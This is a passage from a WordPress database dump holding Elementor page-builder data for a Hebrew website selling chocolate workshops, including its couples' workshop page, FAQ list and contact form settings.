\\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1750,357,'_elementor_version','2.7.5'),(1751,357,'_elementor_template_type','wp-post'),(1752,357,'_elementor_pro_version','2.7.3'),(1756,358,'_wp_page_template','elementor_header_footer'),(1757,358,'_elementor_edit_mode','builder'),(1758,358,'_elementor_data','[{\"id\":\"19fc9855\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6ce1bfb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"23397fa3\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fcac0b5\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"25a68cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70.526},\"elements\":[{\"id\":\"c0d3ce2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"size\":\"xl\",\"header_size\":\"h1\",\"align\":\"right\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"03908aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><b>\\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d9\\u05d5\\u05dd \\u05e7\\u05e1\\u05d5\\u05dd \\u05e9\\u05dc \\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea? \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d4\\u05d0\\u05e4\\u05e8\\u05d5\\u05d3\\u05d9\\u05d6\\u05d9\\u05d0\\u05e7 \\u05d4\\u05d0\\u05de\\u05d9\\u05ea\\u05d9 \\u05d4\\u05d5\\u05d0 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05ea\\u05d5\\u05e7 \\u05d5\\u05d1\\u05db\\u05dc\\u05dc, \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d4\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd \\u05e9\\u05de\\u05e2\\u05d5\\u05e8\\u05e8\\u05d9\\u05dd \\u05ea\\u05d9\\u05d0\\u05d1\\u05d5\\u05df \\u05d2\\u05dd \\u05dc\\u05d1\\u05e0\\u05d9\\/\\u05d1\\u05e0\\u05d5\\u05ea \\u05d4\\u05d6\\u05d5\\u05d2.\\u00a0<\\/b><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"fb2ce26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/couple-chocho.jpg\",\"id\":76},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b16306\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><\\/p>\\n<p>\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d5\\u05ea \\u05d6\\u05d4 \\u05d1\\u05e2\\u05e6\\u05dd \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e8\\u05da \\u05dc\\u05e4\\u05e0\\u05d9 \\u05e9\\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05d5\\u05de\\u05d7\\u05d1\\u05e7\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05dc\\u05e2\\u05e8\\u05d1\\u05d1, \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8, \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05db\\u05dc \\u05e8\\u05d5\\u05d1\\u05d3 \\u05db\\u05d6\\u05d4 \\u05d0\\u05d5 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05dc\\u05d0\\u05d7\\u05e8 \\u05de\\u05db\\u05df, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05d5. \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.&nbsp;<\\/p>\\n<h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2>\\n<ul>\\n<li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li>\\n<li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li>\\n<li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li>\\n<li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li>\\n<\\/ul>\\n<p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"106e6d0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><span style=\\\"text-decoration: underline;\\\"><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/span><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><\\/li><\\/ul><div>\\u00a0<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from 